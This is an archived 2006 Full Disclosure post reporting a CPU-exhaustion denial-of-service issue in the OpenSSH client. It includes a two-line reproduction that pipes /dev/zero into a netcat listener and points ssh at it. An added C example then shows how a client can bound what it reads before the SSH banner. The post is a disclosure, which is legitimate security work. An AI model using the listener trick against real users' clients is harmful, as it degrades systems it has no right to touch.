Full Disclosure mailing list archives

Possible DOS issue in OpenSSH ssh client


From: Espen Grøndahl <espen () espen mine nu>
Date: Tue, 13 Jun 2006 14:54:51 +0200

During some testing I found a possible bug/issue with OpenSSH ssh client.

MachineA # cat < /dev/zero | nc -l -p 3000

MachineB# ssh someone@MachineA -p 3000

I have tested on OpenBSD 3.9, CentOS 4.3, Debian 3.1 and Solaris 9.

This consumes 50-100% of available CPU time on MachineB (depending on the
bandwidth between them).

This could be used in a denial of service attack – or could be used to stop
(or at least annoy) ssh bruteforcers :-)

But of course it would also consume my upstream bandwidth…

Espen

http://espen.mine.nu
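One client-side mitigation pattern for the situation reported above, where the peer streams bytes and never sends an SSH identification line: bound what is read before the banner. This is an added example, not code from the original post or from OpenSSH; the function name `read_ssh_banner` and the 8192-byte budget are assumptions, and the line rules (255-byte limit, no NUL bytes, optional lines before the `SSH-` line) follow RFC 4253.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define MAX_LINE 255    /* RFC 4253 caps the identification line at 255 bytes */

/* Hypothetical helper: read lines from fd until one starts with "SSH-".
 * Returns 0 and stores the banner (CR/LF stripped) in out; returns -1 on EOF,
 * read error, a NUL byte, an over-long line, or after `budget` bytes in total. */
int read_ssh_banner(int fd, char *out, size_t outlen, size_t budget)
{
    char line[MAX_LINE + 1];
    size_t len = 0, total = 0;
    char c;

    while (total < budget) {
        if (read(fd, &c, 1) <= 0)       /* byte-at-a-time for clarity */
            return -1;                  /* EOF or error before any banner */
        total++;
        if (c == '\n') {
            if (len > 0 && line[len - 1] == '\r')
                len--;
            line[len] = '\0';
            if (strncmp(line, "SSH-", 4) == 0) {
                if (len >= outlen)
                    return -1;          /* caller's buffer is too small */
                memcpy(out, line, len + 1);
                return 0;
            }
            len = 0;                    /* pre-banner line: drop it, keep counting */
            continue;
        }
        if (c == '\0' || len >= MAX_LINE)
            return -1;                  /* NUL byte or over-long line: give up */
        line[len++] = c;
    }
    return -1;                          /* byte budget spent without a banner */
}

int main(void)
{
    char banner[MAX_LINE + 1];
    if (read_ssh_banner(STDIN_FILENO, banner, sizeof banner, 8192) != 0) {
        puts("no valid SSH banner within budget; disconnect");
        return 1;
    }
    printf("banner: %s\n", banner);
    return 0;
}
```

A wall-clock timeout on the socket is still needed alongside the byte budget, since a peer can also send nothing at all.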

 

 

 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
